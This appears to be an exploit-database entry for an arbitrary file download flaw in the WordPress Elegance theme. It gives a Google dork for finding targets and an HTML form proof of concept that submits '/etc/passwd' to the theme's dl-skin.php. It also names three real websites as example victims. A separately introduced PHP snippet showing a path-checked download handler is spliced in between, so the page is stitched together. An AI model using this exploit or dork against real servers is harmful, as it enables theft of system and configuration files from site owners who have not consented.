Wordpress Theme Elegance Arbitrary File Download Vulnerability

2014-06-20T00:00:00
ID 1337DAY-ID-22355
Type zdt
Reporter Aloulou
Modified 2014-06-20T00:00:00

Description

This exploit allows an attacker to download any writable file from the server.

Usage Info

Put the path of the file in the File field of the exploit, then click the "Download" button to get the file directly.

                                        
############################################################################
 
# Title : Wordpress Theme Elegance Arbitrary File Download Vulnerability   
 
# Author : Aloulou                                             
 
# Date : 19/06/2014                                                    
 
# Facebook : http://www.facebook.com/Aloulou.TN                               
 
# Email: [email protected]
 
# Vendor : www.wordpress.org                                                     
 
# Google Dork : inurl:/wp-content/themes/elegance 
 
# Tested on : Linux
                        
 
 
############################################################################
 

 
Exploit:
 
<html>
<body>
<form action="http://127.0.0.1/wp-content/themes/elegance/lib/scripts/dl-skin.php" method="POST">
<b>File</b>:<input type="text" name="_mysite_download_skin" value="/etc/passwd"><br>
<input type="submit" value=Download>
</form>
</body>
</html>
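
A defensive counterpart to the form above, added here as an example (it is not the theme's code, whose source this page does not show): a download handler that accepts the same `_mysite_download_skin` field but resolves it only to files inside one directory. The `skins` directory, the file-name pattern and the `resolve_skin` helper are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Assumption: downloadable skins live in ./skins beside this script.
const SKIN_DIR = __DIR__ . '/skins';

/**
 * Hypothetical helper: map a requested skin name to a real file inside
 * $baseDir, or return null when the request must be refused.
 */
function resolve_skin(string $requested, string $baseDir = SKIN_DIR): ?string
{
    // Allowlist a bare file name: no slashes, no dots except the extension,
    // no NUL bytes. "/etc/passwd" and "../../wp-config.php" both fail here.
    if (preg_match('/\A[A-Za-z0-9_-]{1,64}\.(css|zip)\z/', $requested) !== 1) {
        return null;
    }

    // Resolve symlinks, then confirm the result is still under the base
    // directory, so a symlink planted inside skins/ cannot point elsewhere.
    $base = realpath($baseDir);
    $path = realpath($baseDir . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return is_file($path) ? $path : null;
}

if (PHP_SAPI !== 'cli' && ($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    $raw  = $_POST['_mysite_download_skin'] ?? '';
    $path = is_string($raw) ? resolve_skin($raw) : null;  // arrays are rejected
    if ($path === null) {
        http_response_code(400);
        exit('Invalid skin');
    }
    header('Content-Type: application/octet-stream');
    header('X-Content-Type-Options: nosniff');
    header('Content-Disposition: attachment; filename="' . basename($path) . '"');
    header('Content-Length: ' . (string) filesize($path));
    readfile($path);
    exit;
}
```

With this check, the value `/etc/passwd` from the form is refused with a 400 response before any filesystem access takes place.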



    
 
Examples:
http://www.floridapace.gov
http://www.eglevskyballet.org
http://mudtitanrun.com
 
# Greeting to : Tunisia ,  CyberPink , AnonBoy and All muslims

#  0day.today [2018-02-09]  #